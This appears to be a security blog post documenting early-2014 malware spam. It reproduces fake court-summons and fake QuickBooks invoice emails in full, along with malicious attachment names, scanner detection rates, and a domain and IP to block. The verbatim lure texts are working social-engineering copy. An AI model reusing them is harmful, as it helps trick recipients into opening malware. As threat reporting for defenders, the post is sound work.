
Sample emails:

Date:      Tue, 31 Dec 2013 06:45:59 -0700 [08:45:59 EST]
From:      Notice to Appear [support.7@lw.com]
Subject:      Urgent court notice No#14110

 Notice of appearance,
   Hereby you are informed that you are due in the court of New York
   on the 19 of January, 2014 at 10:00 am for the hearing of your case.
   You are kindly asked to prepare and bring the documents relating to
   the case to Court on the specified date.
   Please, download the copy of the court notice attached herewith to
   read the details.
   Note: The case may be heard by the judge in your absence if you do not
   come.
   Yours truly,
   Clark Murphy
   Clerk to the Court.

============================

Date:      Mon, 30 Dec 2013 17:03:29 -0400 [12/30/13 16:03:29 EST]
From:      Notice to Appear [aa.support933@jonesday.com]
Subject:      Notice of appearance in court NR#4723

 Notice to Appear,
   Hereby you are notified that you have been scheduled to appear for
   your hearing that
   will take place in the court of Washington in January 17, 2014 at
   10:00 am.
   Please bring all documents and witnesses relating to this case with
   you to Court on your hearing date.
   The copy of the court notice is attached to this letter.
   Please, read it thoroughly.
   Note: If you do not attend the hearing the judge may hear the case in
   your absence.
   Yours truly,
   Evie Mason
   Clerk to the Court.

============================

Date:      Mon, 30 Dec 2013 13:05:54 -0600 [12/30/13 14:05:54 EST]
From:      Notice to Appear [order.040@gibsondunn.com]
Subject:      Hearing of your case in Court No7712

 Notice to Appear in Court,
   This is to advise that you are required to attend
   the court of Los Angeles in January 11, 2014 for the hearing of your
   case.
   Please, kindly prepare and bring the documents related to this case to
   Court on the date mentioned above.
   Attendance is compulsory.
   The copy of the court notice is attached to this letter, please,
   download and read it thoroughly.
   ALLEN Walsh
   Clerk to the Court.

Sample attachments:
Court_Notice_Latham_and_Watkins__NY07550.zip
Court_Notice_Jones_Day_Wa#6152.zip
Court_Notice_Los_Angeles_No0216.zip

Update 3: [8/1/2014] another slight variation of this has gone out in the past day or so..

Date:      Mon, 06 Jan 2014 18:12:16 -0400 [01/06/14 17:12:16 EST]
From:      Court attendance notification [help151@perkinscoie.com]
Subject:      Court attendance notification #No597

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Louisiana in February 23, 2014 at 10:30 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Donna Tailor

============================

Date:      Tue, 07 Jan 2014 10:56:43 -0500 [01/07/14 10:56:43 EST]
From:      Pretrial Notice [notice_support.6@alston.com]
Subject:      Judicial summons No8365

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 19, 2014 at 10:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Karen Mason

============================

Date:      Tue, 07 Jan 2014 A.D. 18:33:05 -0400 [01/07/14 17:33:05 EST]
From:      Pretrial Notice [support.3@alston.com]
Subject:      Judicial summons No3877

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 20, 2014 at 10:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Mary Smith

============================

Date:      Wed, 08 Jan 2014 02:54:03 -0500 [02:54:03 EST]
From:      Pretrial Notice [notice_support.8@alston.com]
Subject:      Notice of appearance in court No96162

 Pretrial notice,
   Hereby we inform that you are obliged to come as a defendant
   to The Court of Atlanta in February 12, 2014 at 09:00 a.m.
   for the hearing of your case of illegal software use.
   If necessary you have a right to obtain a lawyer for your protection.
   You are kindly asked to have an identity document with you.
   Personal appearance is compulsory.
   Please find the plaint note with more detailed case information
   attached to this letter and study it thoroughly.
   Court clerk,
   Alison Tailor

Sample attachment names:
Plaint_Note_Document_06_01#0478.zip
Plaint Note_06_01_2014_No2964.zip
Plaint_Note_Document_06_01#1619.zip
Plaint_Note_Document_06_01#6017.zip

This malware is detected by 28/48 scanners at VirusTotal, but the Malwr analysis of what it does seems pretty inconclusive.

QuickBooks spam / Invoice.zip

This fake QuickBooks spam has a malicious attachment:

Date:      Mon, 23 Dec 2013 07:54:35 -0800 [10:54:35 EST]
From:      QuickBooks Invoice [auto-invoice@quickbooks.com]
Subject:      Important - Payment Overdue

Please find attached your invoices for the past months. Remit the payment by 12/23/2013 as outlines under our "Payment Terms" agreement.

Thank you for your business,

Sincerely,
Randal Owen

This e-mail has been sent from an automated system.  PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you. 

Attached to the message is a file Invoice.zip which has a VirusTotal detection rate of 5/44, which in turn contains a malicious executable Invoice.exe with a detection rate of 5/49.

Automated analysis [1] [2] [3] shows an attempted connection to wifordgallery.com on 174.127.73.250 (Hosting Services Inc, US), it appears to be the only domain on that server so blocking the IP or domain itself may give you some protection against this current run of malware.